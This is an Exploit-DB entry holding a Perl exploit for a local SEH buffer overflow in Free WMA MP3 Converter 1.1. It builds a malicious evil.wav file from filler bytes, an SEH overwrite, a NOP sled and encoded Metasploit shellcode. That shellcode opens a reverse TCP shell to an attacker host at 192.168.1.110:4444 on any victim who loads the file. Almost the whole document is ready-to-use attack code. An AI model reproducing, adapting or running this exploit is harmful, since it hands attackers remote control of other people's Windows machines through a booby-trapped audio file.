Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow

EDB-ID:

10010

CVE:


Author:

KriPpLer

Type:

local

Platform:

Windows

Published:

2009-10-09

#!/usr/bin/perl
#
############################################
# Free WMA MP3 Converter v1.1 (.wav) Local Buffer Overflow [seh]
# Vendor: http://www.eusing.com/
# Discovered by: KriPpLer 
# http://www.x-sploited.com/
# Tested on: Windows XP Pro SP2.
############################################

# Description: 

# FREE WMA MP3 converter v1.1 Local Buffer Overflow Exploit (SEH)

# This application is vulnerable to a buffer overflow when converting 
# malformed .wav files. This allows for arbitrary code execution on 
# the users machine.

# 1) Open Free WMA MP3 Converter
# 2) Select an output path in settings
# 3) Load the specially crafted evil.wav file
# 4) click Start...

# windows/shell_reverse_tcp - 341 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LHOST=192.168.1.110, EXITFUNC=seh, LPORT=4444

my $shellcode =  
"\xb8\x1f\xcb\x50\x0c\xdb\xce\x29\xc9\xd9\x74\x24\xf4\xb1" .
"\x4f\x5b\x31\x43\x14\x03\x43\x14\x83\xc3\x04\xfd\x3e\xac" .
"\xe4\x88\xc1\x4d\xf5\xea\x48\xa8\xc4\x38\x2e\xb8\x75\x8c" .
"\x24\xec\x75\x67\x68\x05\x0d\x05\xa5\x2a\xa6\xa3\x93\x05" .
"\x37\x02\x1c\xc9\xfb\x05\xe0\x10\x28\xe5\xd9\xda\x3d\xe4" .
"\x1e\x06\xcd\xb4\xf7\x4c\x7c\x28\x73\x10\xbd\x49\x53\x1e" .
"\xfd\x31\xd6\xe1\x8a\x8b\xd9\x31\x22\x80\x92\xa9\x48\xce" .
"\x02\xcb\x9d\x0d\x7e\x82\xaa\xe5\xf4\x15\x7b\x34\xf4\x27" .
"\x43\x9a\xcb\x87\x4e\xe3\x0c\x2f\xb1\x96\x66\x53\x4c\xa0" .
"\xbc\x29\x8a\x25\x21\x89\x59\x9d\x81\x2b\x8d\x7b\x41\x27" .
"\x7a\x08\x0d\x24\x7d\xdd\x25\x50\xf6\xe0\xe9\xd0\x4c\xc6" .
"\x2d\xb8\x17\x67\x77\x64\xf9\x98\x67\xc0\xa6\x3c\xe3\xe3" .
"\xb3\x46\xae\x6b\x77\x74\x51\x6c\x1f\x0f\x22\x5e\x80\xbb" .
"\xac\xd2\x49\x65\x2a\x14\x60\xd1\xa4\xeb\x8b\x21\xec\x2f" .
"\xdf\x71\x86\x86\x60\x1a\x56\x26\xb5\x8c\x06\x88\x66\x6c" .
"\xf7\x68\xd7\x04\x1d\x67\x08\x34\x1e\xad\x3f\x73\x89\x8e" .
"\xe8\x7a\x24\x67\xeb\x7c\xa9\x2b\x62\x9a\xa3\xc3\x22\x35" .
"\x5c\x7d\x6f\xcd\xfd\x82\xa5\x45\x9d\x11\x22\x95\xe8\x09" .
"\xfd\xc2\xbd\xfc\xf4\x86\x53\xa6\xae\xb4\xa9\x3e\x88\x7c" .
"\x76\x83\x17\x7d\xfb\xbf\x33\x6d\xc5\x40\x78\xd9\x99\x16" .
"\xd6\xb7\x5f\xc1\x98\x61\x36\xbe\x72\xe5\xcf\x8c\x44\x73" .
"\xd0\xd8\x32\x9b\x61\xb5\x02\xa4\x4e\x51\x83\xdd\xb2\xc1" .
"\x6c\x34\x77\xff\x9d\x84\x62\x68\x04\x7d\xcf\xf4\xb7\xa8" .
"\x0c\x01\x34\x58\xed\xf6\x24\x29\xe8\xb3\xe2\xc2\x80\xac" .
"\x86\xe4\x37\xcc\x82";

# [junk*4116][nextseh][newseh][nops*24][shellcode...]

my $garbage = "A" x 4116;                  # 4116 bytes to reach nextseh.
my $nextseh = "\xeb\x06\x90\x90";      # short jmp, nop nop overwrite
my $newseh = pack('V',0x1001BD04);  # 0x1001BD04      pop edi, pop - ret (from lame_enc.dll)
my $nops   = "\x90" x 24;                     # 24 byte nop sled

my $scode = $shellcode;                     # 341 byte shellcode

open(myfile,'>evil.wav');

my $info = "\r\n\====================================\n";
$info = $info. "Free Wav to Wma Converter v1.1\n";
$info = $info. "Local Buffer Overflow Exploit \n";
$info = $info."Author: KriPpLer\n";
$info = $info."http://www.x-sploited.com/\n";
$info = $info."====================================\r\n\r\n";
$info = $info."Usage: ./wmacon.pl\r\n\r\n";

print $info;

print myfile $garbage.$nextseh.$newseh.$nops.$scode;

print "[*] evil.wav file created successfully...\r\n";
exit;